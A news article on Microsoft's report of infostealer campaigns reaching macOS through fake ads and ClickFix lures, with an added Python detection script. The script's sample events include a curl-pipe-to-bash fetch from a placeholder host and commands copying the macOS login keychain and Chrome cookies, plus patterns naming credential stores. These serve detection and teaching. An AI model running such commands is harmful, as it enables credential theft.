Infostealers target macOS with fake ads and installers, Microsoft says

Tech & Startup Desk

Microsoft has warned that information-stealing cyberattacks are increasingly targeting Apple’s macOS, marking a shift beyond their traditional focus on Windows systems as attackers adopt cross-platform tools and distribution methods.

In research published by its Defender Security Research Team on February 2, Microsoft said it had observed a rise in macOS-focused infostealer campaigns since late 2025. These operations rely on social engineering techniques, including ClickFix lures, to distribute malicious disk image installers that deploy malware families such as Atomic macOS Stealer, MacSync and DigitStealer.

According to Microsoft, the campaigns use a combination of fileless execution, native macOS utilities and AppleScript automation to steal sensitive data. The information targeted includes web browser credentials and session data, contents of the iCloud Keychain and developer-related secrets.
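The techniques in the preceding paragraph (inline AppleScript via osascript, fileless fetch-and-execute through native utilities, and reads of browser or keychain credential stores) leave traces in process-execution telemetry that a defender can triage. The following Python script is an added illustration, not code from Microsoft's report or from any of the named malware families: it scores a small set of constructed process-start events against heuristics for those behaviours. The log format, the pids and the `example.invalid` hostname are invented for the example; the credential-store paths are the real macOS locations of the login keychain and of Chrome, Brave and Firefox password and cookie databases.

```python
"""Heuristic triage of macOS process-start events for the behaviours the
article describes: inline AppleScript automation (osascript -e), fileless
fetch-and-execute through native utilities, and access to browser or
keychain credential stores. Added example, not Microsoft's detection logic.
"""
import re
import shlex
from dataclasses import dataclass, field

# Real on-disk locations of credential material on macOS (not page IoCs).
CREDENTIAL_STORE_RES = [
    re.compile(r"Library/Keychains/"),
    re.compile(r"Application Support/(?:Google/Chrome|BraveSoftware/Brave-Browser)/.*?(?:Login Data|Cookies)"),
    re.compile(r"Application Support/Firefox/Profiles/.*?(?:logins\.json|cookies\.sqlite|key4\.db)"),
]
SHELLS = {"sh", "bash", "zsh"}
# curl output piped straight into a shell: the script never exists as a file.
FETCH_PIPE_SHELL_RE = re.compile(r"\bcurl\b[^|]*\|\s*(?:ba|z)?sh\b")

# Constructed log format (assumption), one process start per line:
#   <ts> pid=<n> ppid=<n> parent=<name> user=<u> cmd=<shell-quoted command line>
EVENT_RE = re.compile(r"(\S+) pid=(\d+) ppid=(\d+) parent=(\S+) user=(\S+) cmd=(.*)$")


@dataclass
class Finding:
    pid: int
    exe: str
    severity: str
    reasons: list = field(default_factory=list)


def parse_event(line):
    """Parse one constructed event line into a dict, or None if malformed."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ts, pid, ppid, parent, user, cmd = m.groups()
    return {"ts": ts, "pid": int(pid), "ppid": int(ppid), "parent": parent,
            "user": user, "cmd": cmd, "argv": shlex.split(cmd)}


def analyse(event):
    """Return a Finding for a suspicious event, or None for a benign one."""
    argv, cmd = event["argv"], event["cmd"]
    exe = argv[0].rsplit("/", 1)[-1] if argv else ""
    reasons = []
    if exe == "osascript" and "-e" in argv:
        reasons.append("inline AppleScript via osascript -e (no script file on disk)")
    if exe in SHELLS and "-c" in argv:
        reasons.append("shell started with -c: command supplied inline, not from a file")
    if FETCH_PIPE_SHELL_RE.search(cmd):
        reasons.append("curl output piped into a shell (fileless fetch-and-execute)")
    if any(r.search(cmd) for r in CREDENTIAL_STORE_RES):
        reasons.append("command references a browser or keychain credential store")
    # A Terminal parent on an already-suspicious command is consistent with a
    # user pasting a lure's command, the ClickFix pattern the article mentions.
    if event["parent"] == "Terminal" and reasons:
        reasons.append("spawned from Terminal, consistent with a user-pasted (ClickFix-style) command")
    if not reasons:
        return None
    high = any("credential store" in r or "fetch-and-execute" in r for r in reasons)
    return Finding(event["pid"], exe, "high" if high else "medium", reasons)


def triage(lines):
    """Run every parseable event through analyse() and collect the findings."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev:
            f = analyse(ev)
            if f:
                findings.append(f)
    return findings


# Constructed sample events; example.invalid is a reserved placeholder domain.
SAMPLE_EVENTS = [
    '2026-02-03T10:01:02Z pid=4101 ppid=3990 parent=Terminal user=alice cmd=/bin/bash -c "curl -fsSL https://example.invalid/setup.sh | bash"',
    "2026-02-03T10:01:05Z pid=4122 ppid=4101 parent=bash user=alice cmd=/usr/bin/osascript -e 'do shell script \"cp ~/Library/Keychains/login.keychain-db /tmp/k.db\"'",
    '2026-02-03T10:01:06Z pid=4130 ppid=4101 parent=bash user=alice cmd=/bin/cp "/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies" /tmp/c',
    "2026-02-03T10:05:00Z pid=4200 ppid=1 parent=launchd user=alice cmd=/usr/bin/osascript /Users/alice/Scripts/backup.scpt",
    "2026-02-03T10:06:00Z pid=4210 ppid=3990 parent=Terminal user=alice cmd=/usr/bin/curl -o /tmp/release.tgz https://example.invalid/release.tgz",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"pid={f.pid} exe={f.exe} severity={f.severity}")
        for r in f.reasons:
            print("   -", r)
```

The two benign events (an osascript run of a script file from launchd, and a plain curl download without a pipe) produce no finding, which is the point of keying on inline execution and credential-store paths rather than on the utilities themselves: osascript, curl and cp are all legitimate on every Mac, and a detection that fires on their mere presence would drown in noise.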

The attacks often begin with malicious online advertisements, frequently delivered through Google Ads, that appear in search results for legitimate software tools, including AI applications. Users are redirected to counterfeit websites designed to prompt them to install malware themselves.

Microsoft said attackers are increasingly relying on Python-based stealers because of their flexibility and ability to operate across different operating systems with minimal effort. These tools are commonly spread through phishing emails and are used to collect login details, session cookies, authentication tokens, credit card information and cryptocurrency wallet data.

One example cited by Microsoft is PXA Stealer, which the company linked to Vietnamese-speaking threat actors. The malware is capable of harvesting financial and browser data, and was observed in phishing-led campaigns in October and December 2025. In those cases, attackers used scheduled tasks or registry mechanisms to maintain persistence and relied on Telegram for command-and-control communications and data exfiltration.

Microsoft also noted that cybercriminals have used popular messaging platforms, including WhatsApp, to distribute infostealers such as Eternidade Stealer, targeting financial and cryptocurrency accounts. Other campaigns have involved fake software, such as counterfeit PDF editors, promoted through online advertising and search engine manipulation to infect Windows systems.